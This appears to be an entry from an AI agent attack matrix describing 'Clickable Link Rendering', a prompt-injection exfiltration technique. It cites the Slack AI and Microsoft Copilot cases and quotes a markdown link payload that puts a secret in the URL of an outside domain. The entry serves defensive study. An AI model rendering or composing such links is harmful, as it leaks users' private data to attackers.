Clickable Link Rendering

Type: technique

Description: The adversary gets AI to present a URL to the user, which is rendered as a link, and can be clicked by a user. The URL leads to an an attacker-controlled website, allowing the adversary to exfiltrate data through URL parameters. Variants include HTML tags and markdown.

Version: 0.1.0

Created At: 2025-06-19 08:13:23 -0400

Last Modified At: 2025-06-19 08:13:23 -0400

External References

--> Exfiltration (tactic): An adversary can exfiltrate data by embedding it in the parameters of a URL, and getting AI to render it as a clickable link to the user, which clicks it.
--> Content Security Policy (mitigation): Setting a Content Security Policy can mitigate this technique by disrupting an attacker's ability to provide a URL to a domain under their control.
<-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Data to exfiltrate is embedded in a URL parameter, rendered as a clickable link through markdown: Error loading message, [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti).
<-- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information (procedure): Rendering of hyperlinks to attacker controlled domains, resulting in 1-click data exfiltration.

AI Agents Attack Matrix

Clickable Link Rendering

External References

Related Objects

Related Frameworks